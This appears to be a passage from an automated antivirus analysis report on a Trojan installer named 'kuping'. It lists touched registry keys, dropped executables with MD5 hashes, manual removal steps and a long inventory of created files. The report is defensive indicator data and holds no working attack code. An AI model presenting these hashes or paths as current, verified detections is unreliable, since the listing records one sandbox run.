[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Procmon.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"cmd.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"sandbox_svc.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| beeeae3f32b6294026568f661f28a300 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\DW_86.tmp |
| 2ce5a8ecc1a5953a1c68e67a63d17ab0 | c:\Program Files\kuping_b_53390.exe |
| 5b35e2dcdd2ef51b43b0cb0c95dd99f8 | c:\kuping4\BootStart.dll |
| da26a931164cffbbe06f8f326fd07a2d | c:\kuping4\DeskTopPop.exe |
| a1fe4789a9493bc057cf778076af9209 | c:\kuping4\ExpandPackCheck.exe |
| d1bf9c97acd160d940f355601db79064 | c:\kuping4\IndividualCenter.dll |
| 08c4dd9d73cda35e2bf5aedf8d3650e3 | c:\kuping4\KPMsgBoxDll.dll |
| 274366c07438df3cbcacd870516f4058 | c:\kuping4\KPUpdater.dll |
| af9e78dbed7743d930541ebae9f0a600 | c:\kuping4\KpInstallTheme.exe |
| 963848f652d186f1446d37137ad6af70 | c:\kuping4\Kp_BootClr.exe |
| af9aff9994581814fc42f01035e1a39f | c:\kuping4\Kp_BootClry.exe |
| e50a07998f4f25d2bdd4956fe43f020a | c:\kuping4\Repairer.exe |
| ee5e62e9c27b80a0ae5e5a6aa8dab85c | c:\kuping4\SkinCenter.dll |
| 74cb56f1bf76aa6aaae399b9bcbd59b9 | c:\kuping4\ThemeInstall.dll |
| 6d87a9fbdef81c2684711d68af1c6bbb | c:\kuping4\TongJICNZZ.dll |
| e8af0046f405043d4346ce592cb27b28 | c:\kuping4\Uninstall\StartMenu.exe |
| 93369bfd94be0a65a112a298f22f479a | c:\kuping4\UniversalFunction.dll |
| 10ac1f41330bd672957438c037f626f8 | c:\kuping4\Universal\unrar.dll |
| 9623db0c6e12beb2a4f0f1eabfdeef84 | c:\kuping4\Update\UDStatictical.dll |
| 9096c71932f4b2ed18c698c8931f948b | c:\kuping4\Update\UpData.dll |
| 6ba47762b664fb4bd16568ccbe73f758 | c:\kuping4\UserBehaviorStatistics.dll |
| a60bb93f45853fbec835e7e46ee6eb36 | c:\kuping4\dgmon.dll |
| 1ece936c359ff817fa6f0b46409acbfb | c:\kuping4\getnew.exe |
| 328d74becb2fb3c45ad4a66a0a8bf078 | c:\kuping4\kp4_Mini.exe |
| c5585b066357267e6f0f160f22581337 | c:\kuping4\kuping_v4.exe |
| 14f417bbf38dffd22bbbfe49f625f1ca | c:\kuping4\livability.dll |
| 81eb86203f16a41d444154872a48015b | c:\kuping4\login.dll |
| b592ae54151426ecb398f1948ae45162 | c:\kuping4\uninstall.exe |
| f4afe818a97808e389bb579bb3521a39 | c:\kuping4\unrar.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
kp4_Mini.exe:660
kuping_v4.exe:600
dwwin.exe:752
getnew.exe:1672
kuping_b_53390.exe:432 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\kuping4\Universal\UniversalMiniSkin\Mini.ico (1159 bytes)
C:\kuping4\softset.ini (370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_83.tmp (225 bytes)
C:\kuping4\Universal\UniversalMiniSkin\skinconfig.ini (89 bytes)
%Documents and Settings%\%current user%\My Documents\Universal\Universal.ini (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MI_89.tmp (1 bytes)
C:\kuping4\Universal\unrar.dll (185 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\bg.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\309d_appcompat.txt (20221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RM_87.tmp (874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_84.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_8B.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_8D.tmp (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\close.png (2 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\small.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\seach.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\skin.ini (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_86.tmp (213792 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\seach-btn.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\logo.png (4 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini (4 bytes)
C:\kuping4\Update\soft.ini (1714 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.wallba[1].txt (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_80.tmp (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
C:\kuping4\TempDownLoad\Home\11275.jpg_0 (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\Liveindex[1].htm (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\stat[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_81.tmp (2 bytes)
C:\kuping4\Kpclick.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7F.tmp (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11373A.dmp (127725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_82.tmp (426 bytes)
C:\kuping4\Update\updatelog.ini (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\desktop.ini (67 bytes)
%Program Files%\kuping_b_53390.exe (37274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\desktop.ini (67 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-screen.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\bg_focus.png (327 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\LocalManagement_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-6.png (210 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-mause.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\management.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\computer.png (1568 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\aboutme-text.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\delete.png (960 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[1].txt (321 bytes)
C:\kuping4\TempDownLoad\Home\11272.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\image-bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\recover.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\update-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\button-skin-add.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\UploadImageLayer.ini (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\tick_fcous.png (714 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\min.png (338 bytes)
C:\kuping4\TempDownLoad\UserLive\tempfile\userlive.xml (480 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\cursor\right.cur (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\1111.png (199 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\serch-bg.png (161 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_di.png (306 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\RegisterSkin.ini (693 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¿áÆÃÂÂ4\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_block.png (95 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\update.png (556 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\blue.png (307 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\explain.png (559 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_02.png (523 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\scroll-bg.png (305 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SkinInfo.ini (19 bytes)
C:\kuping4\TempDownLoad\Home\11276.jpg (392 bytes)
C:\kuping4\kuping_v4.exe (5620 bytes)
C:\kuping4\Kp_BootClry.exe (1137 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\left-bck.png (1 bytes)
C:\kuping4\SystemConfig\setting.ini (255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.153624[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\MsgBox_1.ini (729 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\share.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\notice.png (1 bytes)
C:\kuping4\Appsoftconfig\image\clear.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_02.png (791 bytes)
C:\kuping4\UniversalFunction.dll (4840 bytes)
C:\kuping4\Appsoftconfig\image\ielogo.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\login_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg.png (283 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_01.png (784 bytes)
C:\kuping4\Uninstall\StartMenu.exe (24 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Conventional-set.png (988 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\attention.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-icon.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-pause.png (669 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-3.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\max.png (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\App.png (868 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\x.png (943 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\lijixiufu.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-2.png (1 bytes)
C:\kuping4\TempDownLoad\StartUp\tempfile\StartUp.xml (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_deck.png (175 bytes)
C:\kuping4\MSGBoxSkin\UI\stop_button.png (1 bytes)
C:\kuping4\Appsoftconfig\image\buttoncmd.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kp4.2flash_01.png (791 bytes)
C:\kuping4\Update\SkinResource\CheckUpdate.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Default-recovery_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\bg_02.png (4 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\center-line.png (128 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\collection.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\bg.png (341 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\theme.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\Uninstall.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\cancel.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\close.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\album.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\UpDateMenu_Layer.ini (1 bytes)
C:\kuping4\MSGBoxSkin\MSGBoxSkin.ini (2 bytes)
C:\kuping4\MSGBoxSkin\UI\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-Screen-saver.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\bg_02.png (1765 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\mainsub.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\index[1].htm (750 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\progress.png (107 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MouseNavigation_Layer.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\search.png (681 bytes)
C:\kuping4\KPUpdater.dll (3439 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\smile.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\LZMA.dll (68 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\re-choice.png (371 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\help.png (633 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\home.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list_wallpaper.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\mause.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\lefr_bg.png (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\h[1].js (5 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\ApplicationMenu_Layer.ini (3 bytes)
C:\kuping4\QuickenFunctionConfig\Management\status.ini (161 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\mainsub.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\newcreat-bg.png (171 bytes)
C:\kuping4\Update\SkinResource\Minimize.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\Modify-head.png (922 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\iconlist_bg.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\¿áÆÃÂÂ4.0flash_02.png (414 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\tick.png (227 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\bg_top.png (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\TailorHeadImageLayer.ini (1 bytes)
C:\kuping4\TempDownLoad\Home\11273.jpg (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\sure_button.png (1 bytes)
C:\kuping4\KpInstallTheme.exe (1764 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\update-online_botton.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\silent_download.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\newcreat-focus.png (214 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\progress_focus.png (190 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\focus.png (222 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\theme-max.png (1529 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\icon_focus.png (483 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\failRefresh.png (382 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\logo_s.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[2].txt (545 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MenuSetConfig.ini (48 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-bg.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\MainSkin.ini (697 bytes)
C:\kuping4\Universal\Soft\softset.ini (78 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\cancel.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\tag.ini (205 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_02.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Personal-center.png (196 bytes)
C:\kuping4\MSGBoxSkin\UI\retry_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\cursor\left.cur (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag-line.png (108 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notMulti.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\help_icon.png (730 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\error.png (544 bytes)
C:\kuping4\Universal\skinConfig.rar (980 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\silder.png (363 bytes)
C:\kuping4\VersionConfig.xml (1060 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notcheak.png (391 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\bg.png (1372 bytes)
C:\kuping4\getnew.exe (1960 bytes)
C:\kuping4\SpecialSubject.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\cancel.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\down.png (178 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\SkinCenter.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\MainSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\loading.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\jindutiao.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\line.png (109 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\reg-btn.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\focus-bg.png (107 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\notchoose.png (879 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\aboutme.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg1.png (258 bytes)
C:\kuping4\TempDownLoad\UserLive\version.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\scroll_thumb.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\install-button.png (1 bytes)
C:\kuping4\QuickenFunctionConfig\Management\ManagementCommerce.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\white.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_03.png (421 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\delete.png (1 bytes)
C:\kuping4\info.ini (16 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\login_bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\log-bckhead.png (4 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\tui-chu.png (232 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\application.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\close.png (2 bytes)
C:\kuping4\Appsoftconfig\image\buttonclear.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AppDlgConfig\MainDlgSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\loading.png (2 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\advert.png (980 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_top.png (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\NoticeDlgSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\line_w.png (91 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\pro.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\SkinCenterDownload.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\notMulti.png (912 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\IconsFolderNavigation_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\loading.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\myBaoku.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\load.png (3 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\config.153624[1].xml (266 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\install_icon.png (971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7E.tmp (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\cover.png (109 bytes)
C:\kuping4\TempDownLoad\TagInfo\list_win7.xml (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\title-bg.png (2 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\bg.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set.png (522 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\stat[1].gif (43 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\bg_nf.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\download.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cut_button-ato.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kankan.png (1921 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin.png (629 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\green.png (324 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\bg_01.png (708 bytes)
C:\kuping4\MSGBoxSkin\UI\success.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\choose.png (883 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\Login_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\new-bg.png (274 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-5.png (214 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\news.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\upload_button.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg2.png (182 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\bg.png (784 bytes)
C:\kuping4\TempDownLoad\Home\11279.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\meihua.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_thumb.png (744 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\page.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\scroll_block.png (763 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\notice-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateNetError.ini (633 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateDownloadPage.ini (592 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\bg1.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\loading2.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\city-about.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\menu_move.png (440 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\Label-input-box.png (258 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\open.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\uphead.png (1 bytes)
C:\kuping4\QuickenFunctionConfig\home\HomeConfig.xml (1 bytes)
C:\kuping4\TempDownLoad\Home\Homeversion.ini (31 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\yellow.png (298 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\log-bck.png (543 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\danxuan.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\focus.png (142 bytes)
